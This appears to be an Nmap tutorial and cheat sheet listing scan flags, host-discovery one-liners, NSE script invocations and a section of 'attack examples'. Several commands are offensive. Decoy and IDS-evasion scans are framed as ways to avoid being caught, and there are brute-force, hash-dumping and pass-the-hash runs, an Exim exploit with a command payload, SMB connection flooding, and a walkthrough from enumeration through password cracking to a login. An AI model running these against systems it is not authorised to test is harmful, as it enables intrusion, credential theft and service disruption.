Nmap is a great tool for discovering the network services and ports that your server is exposing to the network. In this guide, we will discuss some basic information, network scanning and advanced techniques covers how to use one of the most powerful and flexible network scanners available.
1 NMAP Flags………………………………………………………..
2 Common Nmap Uses…………………………………………………..
3 Scan Types………………………………………………………..
4 Scan by using NSE Scripts…………………………………………..
5 NMAP Attack Examples……………………………………………….
5.1 Privilege Escalation……………………………………………..
5.2 NMAP the Target Network…………………………………………..
5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack……………….
5.4 Hacking Windows 7 with NMAP and Metasploit………………………….


  • sudo nmap -T4 -A -sV -p 1-65535 <Target IP>
  • sudo nmap -T4 -A -v -p 1-65535 <Target IP> Ref: SEC-2259
  • sudo nmap -n -vv -A<Target IP> –min-parallelism=50 –max-parallelism=150 -PN-T2 -oA<Target IP> Ref: SEC-2264

1 NMAP Flags

-sL List Scan (List Targets to Scan)
-sn Ping Scan (Disable Port Scan)
-sS SYN Scan
-sT TCP Connect Scan
-sP Ping Scan
-sU UDP Scan
-sO IP Scan
-b FTP Bounce Scan
-sN TCP Null Scan
-sF FIN Scan
-sX XMAS Scan
-sA ACK Scan
-sW Windows Scan
-sR RPC Scan
-sI <zombie host[:probeport]>: Idle scan
-sV Probe Open Ports to Identify Service Version Info Scan
-sC SNMP Scan
-A Enable OS Detection, Version Detection, Script Scanning, and TraceRoute

-Pn Treat All Hosts as OnLine (Skip Host Discovery)
-PN Do Not Ask for ICMP Echo Response
-PS / PA / PU / PY[portlist] TCP SYN/ACK, UDP or SCTP Discovery to Specified Ports
-PE / PP / PM ICMP Echo, Timestamp, and Netmask Request Discovery Probes
-n / -R Never do DNS Resolution / Always Resolve [Default: Sometimes] –dns-servers <serv1[,serv2],…> Specify Custom DNS Servers
–system-dns Use OS’s DNS Resolver
–traceroute Trace Hop Path to Each Host

-F Fast Mode
-p <Port-Range>
-O OS Detection
-T<0-5> Timing Template (Higher is Faster)

-f; –mtu <val> Fragment Packets (Optionally with specified MTU)
-D <decoy1,decoy2[,ME],…> Cloak a Scan with Decoys
-S <IP_Address> Spoof Source Address
-e <iface> Use Specified Network Interface
-g <portnum> Use specified Port Number
–data-length <num> Append Random Data to Sent Packets
–ip-options <options> Send Packets with Specified IP Options
–ttl <val> Set IP Time-To-Live Field
–spoof-mac <MAC Address/Prefix/Vendor Name> Spoof your MAC address
–badsum Send Packets with a Bogus TCP/UDP/SCTP Checksum

-oN/-oX/-oS/-oG <file> Output Scan in Normal, XML, s|<rIpt kIddi3, and Grepable Format, respectively, to the Specified FileName.
-oA <basename> Output in the three major formats at once
-v Increase Verbosity Level (-vv or More for a Greater Verbosity)
-d Increase Debugging Level (-dd or More for a Greater Verbosity)
–reason Display the Reason a Port is in a Particular State
–open Only Show Ppen (or Possibly Open) Ports
–packet-trace Show All Packets Sent and Received
–iflist Print Host Interfaces and Routes (for Debugging)
–log-errors Log Errors/Warnings to the Normal-Format Output File
–append-output Append to Rather than Clobber Specified Output Files
–resume <filename> Resume an Aborted Scan

-iL <Input FileName> Input Targets from a List of Hosts in the Specified File
-iR <Num Hosts> Choose Random Targets
–exclude <host1[,host2][,host3],…> Exclude Hosts / Networks
–excludefile <exclude_file> Exclude List of Nosts / Network from File

2 Common Nmap Uses

Full Scan:
nmap -p1-5000 -T4 -sS

Use a Decoy when Scanning Ports to Avoid getting Caught by the SysAdmin
This will show the Decoy IP Address Instead of Your IP in Targets Security Logs. Decoy IP Address Needs to be Alive.
Check the Targets Security Log (/var/log/secure) to make Sure it Worked.
nmap -sS -D

Scan the Same Network for All the Services in /etc/services (All of the Reserved Ports) via Very Fast TCP Scan:
nmap -F warez.com/24

Port Scan:
nmap target
nmap -v -sT
ncat -v -l -p 111
for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Ping Scan (or Ping Sweep) of a Subnet:
nmap -sP
for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep ‘from’; done

Get List of Servers with a Specific Port Open through a TCP Connect Scan (is Slower and has More Overhead than a SYN Scan):
nmap -sT -p 80 -oG – 192.168.1.* | grep open

List of reverse DNS records for a subnet:
nmap -R -sL | awk ‘{if($3==”not”)print”(“$2″) no PTR”;else print$3″ is “$2}’ | grep ‘(‘

Find Duplicate Address in a Subnet
for i in $(seq 1 254); do echo “arping -q -D -I eth0 -c 2 192.168.1.${i}”; [ $? -ne 0 ] && echo “192.168.1.${i} duplicate”; done

Find All of the Active IP Addresses in a Subnet (by using Ping Scan):
nmap -sP 192.168.0.*
nmap -sP -R |grep up
nmap -sP -PR 192.168.0.*
nmap -sP > lanscan.txt
nmap -sP; arp -n | grep “192.168.1.[0-9]* *ether”
ping -c2 >/dev/null; arp -a
arp-scan -l
arp-scan -I eth0

nmap -v -sP

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo “192.168.1.$ip UP” || : ; done
for ip in $(seq 1 254); do nslookup 192.168.1.$ip; [ $? -eq 0 ] && echo “192.168.1.$ip UP” || : ; done

OR on Windows:
for /L %i in (1,1,254) do ping -n 1 10.254.254.%i | find /i “Reply”>> c:\ipaddresses.txt

OR Faster:
nmap -sP | grep -oE ‘([[:digit:]]{1,3}.){3}[[:digit:]]{1,3}’

Find All of the Active Hosts in the the Adjacent class C’s 193.14.12, .13, .14, .15, … , .30:
nmap -P ‘193.14.[12-30].*’

OR, If you don’t want to have to quote it to avoid shell interpretation:
nmap -P 193.14.12-30.0-255

Find All Unused IP Addresses in a Subnet:
nmap -sP -R |grep down

nmap -T4 -sP && egrep “00:00:00:00:00:00” /proc/net/arp

fping -g 2>/dev/null
fping -g 2>/dev/null | grep ‘is unreachable’ | cut -d ‘ ‘ -f 1 | sort -t ‘.’ -k 4 -n

How Many Linux And Windows Devices Are On Your Network?
nmap -F -O | grep “Running: ” > /tmp/os; echo “$(cat /tmp/os | grep Linux | wc -l) Linux device(s)”; echo “$(cat /tmp/os | grep Windows | wc -l) Window(s) devices”

OS Detection Scan:
With so many different operating systems and versions around, it is really interesting how Nmap detects the operating system of a target in a very short time. Let us study the OS detection command in detail.

Table 1: Analysing the output of an OS detection scan
Item Interpretation
nmap -O -v -oversiondetect.txt Syntax of the executed command. -v increases the verbosity of the output.
Initiating OS detection (try #1) against OS detection uses a combination of ICMP echo, TCP and UDP packets.
Host is up (0.0030s latency). Discovered the host status in practically no time
Interesting ports on
Not shown: 997 closed ports

135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Lists detected open ports on the host
MAC Address: 00:16:76:CE:8C:3C (Intel) MAC address of the host’s Ethernet card, and its manufacturer
Device type: general purpose
Running: Microsoft Windows XP With at least one open and one closed port on the target host, Nmap can detect the target OS effectively. To instruct Nmap to detect OS on only such hosts, to save scan time, use the --osscan-limit option
OS details: Microsoft Windows XP SP2 or SP3 or Windows server 2003
Network Distance: 1 hop The host is in the same network
TCP Sequence Prediction: Difficulty=264 (Good luck!) TCP sequence prediction: The TCP 3 way handshake is initiated by a SYN packet followed by an initial sequence number. If this number can be predicted, an attacker can construct a spoofed packet which will appear to have been sent by the scanned host. This denotes the difficulty of predicting the initial sequence number.
IP ID Sequence Generation: Incremental
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/. Gives the user a chance to submit incorrect OS detection data to the Nmap team, for improvements in the next version.
# NMap done at Tue Nov 30 20:13:03 2010 — 1 IP address (1 host up) scanned in 3.56 seconds Completed the whole OS detection for one host in less than 4 seconds!

Security by obscurity? Assuming you are a Web developer, would you be interested in running an httpd service on a non standard TCP port — say, 1793 — rather than on the standard TCP port 80? In the early days, before I knew enough about various Nmap scan techniques, I thought this was just incredible! I felt I’d found a gold mine! If a service is running on a nonstandard port, it does add a great layer of security.

Welcome to the world of Nmap, which detects practically any service, even running on a non-standard port.
Table 2 shows Nmap scan output against a live IPCop firewall with its Web interface configured on the TCP port 1775. By default, IPCop runs the SSH service on the non-standard TCP port 222 (as against the standard SSH port 22). The output is filtered.

nmap -O -v -oversiondetect.txt

OS Detection and Ports Probe Scan against an IPCop Firewall on Ports 222 and 1775 (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -O -PN -p222, 1775 -sV -oIPCopOS.txt 121.xxx.xxx.xxx

Find Rogue AP on a Subnet:
nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan

Find the Conficker Virus on a Subnet (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1

SNMP Win32 Users Scan:
nmap -sV -sC

Scan 4096 IP Addresses for Any Web Servers (without pinging them) and Save Output in grepable and XML formats (using the -Pn Option to Skip Pinging the Targets):
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap

Scan the Specified Subnet for NetBIOS Informations:
nbtscan -v -m 2

Get Current Host Public IP:
alias myip=’curl -s http://checkrealip.com/ | grep “Current IP Address”‘

Complete TCP Handshake on a spcified Host-Port:
nc -zvw 1 host port

IDS Evasion Attack:
nmap -sS -PN -p80,443 -T1

Confuse IDS / IPS by sending requests with decoy’s or different IP address:
nmap -sS -D234.34.34.45,ME, -p 80 www.xyz.com

Get SMB Server Time:
nmap –script=smb-os-discovery.nse xxx.xxx.xxx.xxx/24 -p 139,445 | grep “System time” | sort -r

3 Scan Types

Stealth Scan of the Entire Class “B” Networks and for the IMAPd Daemon:
nmap -Up 143

Stealth SYN Scan with OS Detection on the Specified Network:
nmap -sS -O scanme.nmap.org/24

ACK Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sA -vv -n -p1-1000 -T4 -oNmapACKScan.txt 117.X.X.X

TCP Connect Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sT -vv -n -p1-1000 -T4 -oNmapTCPConnect.txt 117.X.X.X

Version Detection Scan and Host Enumeration on the Specified Ports and IP Address Range
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

SYN Scan to Get Info about Remote Host Ports and OS Detection:
nmap -sS -P0 -sV -O <target>

Fragmented SYN Scan for Open TCP Ports (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -PN -sS -f -vv -n -p1-1000 -T4 -max-rtt-timeout 15 -oNmapSYNScan.txt 117.X.X.X

Fragmented SYN Scan the Class “C” Network on which warez.com Sits for Popular Services:
nmap -fsp 21,22,23,25,80,110 warez.com/24

XMAS Tree Scan on the Specified Subnet:
nmap -v -sX

FIN Scan on the Specified Subnet:
nmap -v -sF

TCP Null Scan on the Specified Subnet:
nmap -v -sN

TCP Windows Scan on the Specified Subnet:
nmap -v -sW

TCP RPC Scan on the Specified Subnet:
nmap -v -sR

FTP Bounce Attack Scan (Scan secret.pathetic.net using the FTP Bounce Attack Off of ftp.pathetic.net):
nmap -Db ftp.pathetic.net secret.pathetic.net

UDP Scan and TCP Connect Scan for Open Ports (Firewall Scan from Inside the Network):
nmap -vv -sU -sT -p1-1000 -n -r -T4 -oNmapIPCopInternal.txt

Idle Scan against the RIAA by providing a Zombie (kiosk.adobe.com):
nmap -P0 -p- -sI kiosk.adobe.com www.riaa.com

Stealth Idle Scan with Packet Trace:
nmap -sI Zombie -Pn -p20-25,110 -r –packet-trace -v Target

4 Scan by using NSE Scripts

The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write and share scripts to automate a wide variety of networking tasks.
Those scripts are written in the embedded Lua programming language and they are executed in parallel.
Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs.
You can find here the official Nmap NSE Scripts and LUA Libraries Portal, where you can browse and download the scripts by categories or by alphabetically name.

You can find below many useful examples of running Nmap scans by using NSE scripts.

Sniffer Detection on the Specified File Containing a List of IP Addresses:
nmap-script sniffer-detect -iL IPList.txt -osniffer-detect.txt

Perform a Firewalking (Discover Firewall Rules using an IP TTL Expiration Technique):
nmap –script=firewalk –traceroute <host>
nmap –script=firewalk –traceroute –script-args=firewalk.max-retries=1 <host>
nmap –script=firewalk –traceroute –script-args=firewalk.probe-timeout=400ms <host>
nmap –script=firewalk –traceroute –script-args=firewalk.max-probed-ports=7 <host>

Detects a Vulnerability in Netfilter and other Firewalls that use Helpers to dynamically Open Ports for Protocols, such as FTP and SIP:
nmap –script firewall-bypass <target>
nmap –script firewall-bypass –script-args firewall-bypass.helper=”ftp”, firewall-bypass.targetport=22 <target>

Perform a DNS Fuzzing Attack against DNS Server:
nmap –script dns-fuzz –script-args timelimit=2h

Perform a Form Fuzzing against Forms on WebSites:
nmap –script http-form-fuzzer -p 80

Crawls a Web Server and Sends an Attack Vector/Probe to Find PHP Files Vulnerable to Reflected Cross Site Scripting via the variable $_SERVER[“PHP_SELF”],
PHP_SELF XSS Refers to Vulnerabilities caused by the Lack of Sanitation of the variable $_SERVER[“PHP_SELF”] commonly used in PHP Scripts that display forms:
The Vector/Probe Attack used is /'”/><script>alert(1)</script>
nmap –script=http-phpself-xss -p80 <target>
nmap -sV –script http-self-xss <target>

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369):
nmap -sV –script realvnc-auth-bypass.nse
nmap -sV -sC –script realvnc-auth-bypass

Oracle 11g Users Scan (bug fixed in Oracle’s October 2009 Critical Patch Update):
nmap –script oracle-enum-users –script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560

Dumps the Password Hashes from an MySQL Server in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 3306 –script mysql-dump-hashes –script-args=’username=root,password=secret’

MySQL Server Users Scan:
nmap -sV –script mysql-users

Brute Force Passwords MySQL:
nmap –script=mysql-brute

Run a Query against a MySQL Database and Returns the Results as a Table:
nmap -p 3306 –script mysql-query –script-args=’query=”SELECT * FROM table_name WHERE (userID LIKE ‘%ELM%’);”[,username=root,password=secret]’
nmap -p 3306 –script mysql-query –script-args=’query=”GRANT ALL PRIVILEGES ON db_base.* TO db_user @’%’ IDENTIFIED BY ‘db_passwd’;”[,username=root,password=secret]’
nmap -p 3306 –script mysql-query –script-args=’query=”INSERT INTO table_name (status, permissions) VALUES (‘OK’,’ALL’) WHERE (userID LIKE ‘%ELM%’);”[,username=root,password=secret]’

Dumps the Password Hashes from an Microsoft SQL Server (ms-sql) in a Format Suitable for Cracking by Tools such as John-the-ripper:
nmap -p 1433 –script ms-sql-dump-hashes

Attempts to Authenticate to Microsoft SQL Servers using an Empty Password for the Sysadmin (sa) Account:
nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all
nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-name=PRDB,mssql.instance-port=1432
nmap -p 1433 –script ms-sql-empty-password

Queries Microsoft SQL Server (ms-sql) Instances for a List of Databases a User has Access to:
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa,mssql.instance-all
nmap -p 1433 –script ms-sql-hasdbaccess –script-args mssql.username=sa,mssql.password=sa,mssql.instance-name=PRDB,mssql.instance-port=1432

Retrieves the Authentication Scheme and Realm of a Web Service that Requires Authentication:
nmap –script http-auth [–script-args http-auth.path=/login] -p80

Scan for Access with Default Credentials used by a variety of Web Applications and Devices:
nmap -p80 –script http-default-accounts

Scan for a JBoss Server is Vulnerable to JMX Console Authentication Bypass (CVE-2010-0738):
nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’

Discovers Valid Usernames by Brute-Force Querying Likely Usernames against a Kerberos Service:
nmap -p 88 –script krb5-enum-users –script-args krb5-enum-users.realm=’test’

Checks Target IP Addresses against Multiple DNS Anti-Spam and Open Proxy Blacklists and Returns a List of Services for which an IP has been Flagged.
Checks may be Limited by Service Category (eg: SPAM, PROXY) or to a Specific Service Name.
nmap –script dns-blacklist –script-args=’dns-blacklist.ip=′
nmap -sn –script dns-blacklist

Detects whether the Remote Device has IP Forwarding or “Internet Connection Sharing” Enabled, by Sending an ICMP Echo Request to a Given Target using the Scanned Host as Default Gateway:
nmap -sn –script ip-forwarding –script-args=’target=www.example.com’

Extracts a List of Citrix Servers from the ICA Browser Service:
nmap -sU –script=citrix-enum-servers -p 1604

Extracts a List of Applications, ACLs, and Settings from the Citrix XML Service:
nmap –script=citrix-enum-apps-xml -p 80,443,8080

Check if ePO Agent is Running on Port 8081 or Port Identified as ePO Agent Port:
nmap -sV –script=mcafee-epo-agent

Check Presence of ms12-020 RDP vulnerability:
nmap –sC –p 3389 –vv –script-trace –script ms12-020-rev.nse

Attempts to Perform an LDAP Search and Returns All Matches:
nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,

nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
ldap.qfilter=custom,ldap.searchattrib=”operatingSystem”,ldap.searchvalue=”Windows *Server*”,ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}’

Retrieves the LDAP Root DSA-Specific Entry (DSE):
nmap -p 389 –script ldap-rootdse

Lists Remote File Systems by Querying the Remote Device using the Network Data Management Protocol (ndmp).
NDMP is a Protocol Intended to Transport Data Between a NAS Device and the Backup Device, Removing the Need for the Data to Pass through the Backup Server.
nmap -p 10000 –script ndmp-fs-info

Retrieves Configuration Information from a Lexmark S300-S400:
nmap -sV –script=lexmark-config

Lotus Domino Users Scan:
nmap –script domino-enum-users -p 1352

Scan for an identd (auth) Server which is Spoofing its Replies:
nmap -sV –script=auth-spoof

Looks for Signature of Known Server Compromises
nmap -sV –script=http-malware-host

Checks if Hosts are on Google’s Blacklist of Suspected Malware and Phishing Servers.
The script queries the Google’s Safe Browsing service and you need to have your own API key to access Google’s Safe Browsing Lookup services.
Sign up for yours at http://code.google.com/apis/safebrowsing/key_signup.html.
nmap -p80 –script http-google-malware

Scan for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523):
nmap –script ftp-vsftpd-backdoor -p 21

Scan for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562:
nmap –script ftp-proftpd-backdoor -p 21

Brute Force Password Scan against the WinPcap Remote Capture Daemon (rpcap):
nmap -p 2002 –script rpcap-brute

Brute Force Password Scan against rsync:
nmap -p 873 –script rsync-brute –script-args ‘rsync-brute.module=www’

Brute Force Password Scan against the VMWare Authentication Daemon (vmware-authd):
nmap -p 902 –script vmauthd-brute

Brute Force Password Scan against VNC Servers:
nmap –script vnc-brute -p 5900

Brute Force Password Scan against SMTP using LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM:
nmap -p 25 –script smtp-brute

Brute Force Password Scan against rlogin service:
nmap -p 513 –script rlogin-brute

Brute Force Password Scan against POP3 Servers using either “USER” (default), “SASL-PLAIN”, “SASL-LOGIN”, “SASL-CRAM-MD5”, or “APOP”:
nmap -sV –script=pop3-brute

Brute Force Password Scan against IMAP Servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM Authentication:
nmap -p 143,993 –script imap-brute

Scan for and/or Exploits a Heap Overflow within Versions of Exim prior to 4.69 (CVE-2010-4344) and a Privilege Escalation Vulnerability in Exim 4.72 and below (CVE-2010-4345).
The heap overflow vulnerability allows remote attackers to execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). If the exploit fails then the Exim smtpd child will be killed (heap corruption).
The privilege escalation vulnerability allows the exim user to gain root privileges by specifying an alternate configuration file using the -C option (CVE-2010-4345).
nmap –script=smtp-vuln-cve2010-4344 –script-args=”smtp-vuln-cve2010-4344.exploit” -pT:25,465,587
nmap –script=smtp-vuln-cve2010-4344 –script-args=”exploit.cmd=’uname -a'” -pT:25,465,587

Detects PHP-CGI Installations Vulnerable to CVE-2012-1823, a Critical Vulnerability that Allows Attackers to Retrieve Source Code and Execute Code Remotely.
The script works by appending “?-s” to the uri to make vulnerable php-cgi handlers return colour syntax highlighted source. We use the pattern “<span style=.*>&lt;?” to detect vulnerable installations.
nmap -sV –script http-vuln-cve2012-1823
nmap -p80 –script http-vuln-cve2012-1823 –script-args http-vuln-cve2012-1823.uri=/test.php

Scan a Web Server for Slowloris DoS attack Vulnerability:
nmap –script http-slowloris –max-parallelism 400

Exhausts a Remote SMB Server’s Connection Limit by Opening as Many Connections as we can.
Most implementations of SMB have a Hard Global Limit of 11 Connections for User Accounts and 10 Connections for anonymous.
Once that Limit is rReached, further Connections are Denied. This Script Exploits that Limit by taking up All the Connections and Holding them.
This works better with a valid user account, because Windows reserves one slot for valid users.
nmap –script smb-flood.nse -p445
nmap -sU -sS –script smb-flood.nse -p U:137,T:139

Detects Huawei Modems Models HG530x, HG520x, HG510x (and others…) Vulnerable to a Remote Credential and Information Disclosure Vulnerability. It also Extracts the PPPoE Credentials and Other interesting Configuration Values.
nmap -p80 –script http-huawei-hg5xx-vuln <target>
nmap -sV http-huawei-hg5xx-vuln <target>

Scan to Discover Hosts in the Local Network using the DNS Service Discovery protocol and Sends a NULL UDP Packet to Each Host to Test if it’s Vulnerable to the Avahi NULL UDP Packet Denial Of Service (CVE-2011-1002):
nmap –script=broadcast-avahi-dos

Exploits the CVE-2012-3137 Vulnerability, a Weakness in Oracle’s O5LOGIN Authentication Scheme:
nmap –script oracle-brute-stealth -p 1521 –script-args oracle-brute-stealth.sid=ORCL

Guesses Oracle Instance/SID Names against the TNS-Listener:
nmap –script=oracle-sid-brute –script-args=oraclesids=/path/to/sidfile -p 1521-1560
nmap –script=oracle-sid-brute -p 1521-1560

Brute Force Password Scan against Nessus Vulnerability Scanning Daemon using the NTP 1.2 Protocol:
nmap –script nessus-brute -p 1241

acarsd Scan on the Specified Port and Host/Network:
nmap –script acarsd-info –script-args “acarsd-info.timeout=10,acarsd-info.bytes=512” -p <port>

Brute Force Password Scan against FTP Server:
nmap –script ftp-brute -p 21

Scan an FTP Server for Anonymous Login:
nmap -sV –script ftp-anon

Spiders a Web Site and Collects eMail Addresses:
nmap –script=http-email-harvest

Checks for a Path-Traversal Vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733):
nmap –script http-vmware-path-vuln -p80,443,8222,8333

Retrieves Information from an Apache Hadoop Secondary NameNode HTTP Status Page:
nmap –script hadoop-secondary-namenode-info -p 50090

Retrieves Information from an Apache Hadoop NameNode HTTP Status Page:
nmap –script hadoop-namenode-info -p 50070

Discovers Hostnames that Resolve to the Target’s IP Address by Querying the Robtex Service at http://www.robtex.com/dns/:
nmap –script hostmap-robtex

Retrieves the Locations of All “Find my iPhone” Enabled iOS Devices by Querying the MobileMe Web Service:
nmap -sn -Pn –script http-icloud-findmyiphone –script-args=’username=<user>,password=<pass>’

Brute Force Password Scan against HTTP Server (Basic Authentication – Default Method GET):
nmap –script http-brute -p 80

Brute Force Password Scan against HTTP Server (Form-Based Authentication):
nmap –script http-form-brute -p 80

Brute Force Password Auditing against Joomla Web CMS Installations:
nmap -sV –script http-joomla-brute –script-args ‘userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true’
nmap -sV –script http-joomla-brute

Brute Force Password Scan against HTTP Proxy Server:
nmap –script http-proxy-brute -p 8080

Brute Force Password Auditing against the BackOrifice Service:
nmap -sU –script backorifice-brute –script-args backorifice-brute.ports=”U:31337,25252,151-222″, “U:1024-1512”

Brute Force LDAP Authentication:
nmap -p 389 –script ldap-brute –script-args ldap.base='”cn=users,dc=cqure,dc=net”‘ <host>

Brute Force Password against iSCSI Target:
nmap -sV –script=iscsi-brute

Brute Force Password against WordPress CMS/Blog Server:
nmap -sV –script http-wordpress-brute
nmap -sV –script http-wordpress-brute –script-args ‘userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true’

Attempts to Guess Valid Credentials for the Citrix PN Web Agent XML Service:
nmap –script=citrix-brute-xml –script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080

Detect Zeus Botnet (by querying [email protected]) in the Specified Network (using the -PN Option as the Ping Response could be Disabled on Host/Firewall):
nmap -v -sn -PN –script=dns-zeustracker

dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch A
dig +short reverse_IP_address_to_check.ipbl.zeustracker.abuse.ch TXT
dig +short domain_name.uribl.zeustracker.abuse.ch A
dig +short domain_name.uribl.zeustracker.abuse.ch TXT
# The Response means that the Domain is Listed on the ZT.
# To Check the IP address
dig +short TXT
# To Check the Domain dantor777.com:
dig +short dantor777.com.uribl.zeustracker.abuse.ch A
dig +short dantor777.com.uribl.zeustracker.abuse.ch TXT

Perform a DNS Update (without Authentication):
nmap -sV –script=dns-update

Performs Password Guessing Against Apple Filing Protocol (AFP):
nmap -p 548 –script afp-brute

Shows AFP shares and ACLs:
nmap -sV –script=afp-showmount

Listens for the LAN Sync Information Broadcasts that the Dropbox.com Client Broadcasts Every 20 seconds, then Prints All the Discovered Client IP Addresses, Port Numbers, Version Numbers, Display Names, and more:
nmap -sV –script=broadcast-dropbox-listener

Discovers EMC Networker Backup Software Servers on a LAN by Sending a Network Broadcast Query:
nmap –script broadcast-networker-discover

Scan to Check Windows Security Mode(s) Supported (for example, if Message signing is not supported, then Man-In-The-Middle Attacks are possible):
nmap -p445 –script=smb-security-mode

Windows OS Discovery Scan:
nmap -p445 -script=smb-os-discovery

Windows Shares Enumeration Scan (Without Specifying Credentials and by Specifying a User and a Password or a Hash):
nmap -p445 –script=smb-enum-shares

by Specifying a User and a Password:
nmap -v -p445 –script=smb-enum-shares –scriptargs=smbuser=administrator,smbpass=blink182

by Specifying a User and a Hash with the “Passwing the Hash” technique (the Hash can be Obtained by Using fgdump or pwdump6, decrypted from the SAM file, dumped with the “smb-pwdump.nse” script):
nmap -p445 –script=smb-enum-shares –scriptargs=smbuser=administrator,smbhash=cd401a40ae92face50b8e4fe1911060e

Password Hashes dumped this way from one server can be directly used to access other servers, without cracking them. The hash can be used directly by passing a “smbhash” argument instead of “smbpass”:

Brute-Force Windows Account Passwords:
nmap -p445 –script=smb-brute.nse,smb-enum-shares

Attempt a Brute Login through SMB Windows Account:
nmap -p445 –script=smb-brute

Windows Users Enumeration (using both SAMR and LSA):
nmap -v -p445 –script=smb-enum-users
nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139

Windows Sessions Enumeration:
nmap -vv -p445 –script=smb-enum-sessions

Windows Processes Enumeration:
nmap -vv -p445 –script=smb-enum-processes –scriptargs=smbuser=test,smbpass=test

Windows System Info:
nmap -p445 –script=smb-system-info –script-args=smbuser=test,smbpass=test

5 NMAP Attack Examples

5.1 Privilege Escalation

Perform a Ping Sweep Check the Active IP Addresses in the Subnet:
nmap -sP

Determine the Remote OS Operating System
nmap -O -v -oversiondetect.txt

nmap -p445 –script=smb-os-discovery

Run Users Enumeration (and grep interesting Info):
nmap -p445 –script=smb-enum-users | grep -A1 “smb-enum-users”

Run smb-brute.nse with the UserName Obtained by the Previous Command:
nmap -p445 –script=smb-brute –script-args=userdb=usernames.txt | grep “^|_”

Perform a PWDUMP if the found User (in this example, “test”) has Access to the password File:
nmap -p445 –script=smb-pwdump –scriptargs=smbuser=test,smbpass=test,rcrack=rcrack,rtable=alpha/*.rt

The Downloaded Hashes are Saved in a File called “password.txt” and smb-brute.nse is re-run using the Hashes instead of the Default Password File:
cat passwords.txt
nmap -p445 –script=smb-brute –scriptargs=userdb=usernames.txt,passdb=passwords.txt

Run PWDUMP and Rainbow Crack against with the Credentials of one of the Users, which will Download the Password Database from that System if that user has Sufficient Access:
nmap -p445 –script=smb-pwdump –scriptargs=smbuser=mary,smbhash=ADA65BF48C2CB30AE608489E290618AA,rcrack=rcrack,rtable=alpha/*.rt

As the Previous Command Determined the Hash and Cracked the Password of the User “jim”, Test the Login:
ssh [email protected]

5.2 NMAP the Target Network

Run a port scan:
nmap -p80 www.targetcompany.com/24

Scanning for port 80, while not necessarily a guarantee, does help to find all the hosts on the target network that are running Web servers. In addition to the public Web server, there may be staging, development, backup, or internal Web servers that are insecure or offer private information. In addition, port 80 is likely to be open on the firewall because Web traffic generally passes over this port.
Nmap returns the IP address (X.X.X.03) of the target, potentially allowing to scan the related class C address space (X.X.X.x). But first you must verify the class associated with the IP address. A popular method for doing this is to consult the whois service for the domain:
whois targetcompany.com

If you’re unable to identify the class of the network (as was the case here), the entire class C will have to be scanned:
nmap -v -p 80 X.X.X.1-254
nmap -v -p 53 -sU X.X.X.1-254
nmap -v -p 53 -sT X.X.X.1-254
nmap -v -p 25 X.X.X.1-254
nmap -v -p 110 X.X.X.1-254
nmap -v -p 143 X.X.X.1-254
nmap -v -p 139 X.X.X.1-254
nmap -v -p 445 X.X.X.1-254
nmap -v -p 3389 X.X.X.1-254
nmap -v -p 6000 X.X.X.1-254

You don’t specify the protocol in the scan against port 80 (the Hyper-Text Transfer Protocol, or HTTP), because Nmap will default to TCP (Transmission Control Protocol), and there is little reason to scan for UDP (User Datagram Protocol) over this port. In successive scans against port 53 (the DNS port), the protocols UDP and TCP were specified. Over these ports, zone information is exchanged; in other words, the host name–to–IP address mappings for that zone are exchanged between DNS servers and routers. Although the DNS has primarily UDP traffic, it does switch to TCP if the traffic is larger than 512 bytes.
If DNS traffic is allowed through the firewall, a zone transfer might be possible. A zone transfer will be possible if the DNS allows transfers to unauthorized zones; however, many DNSs now block zone transfers except to specifically authorized IP addresses.

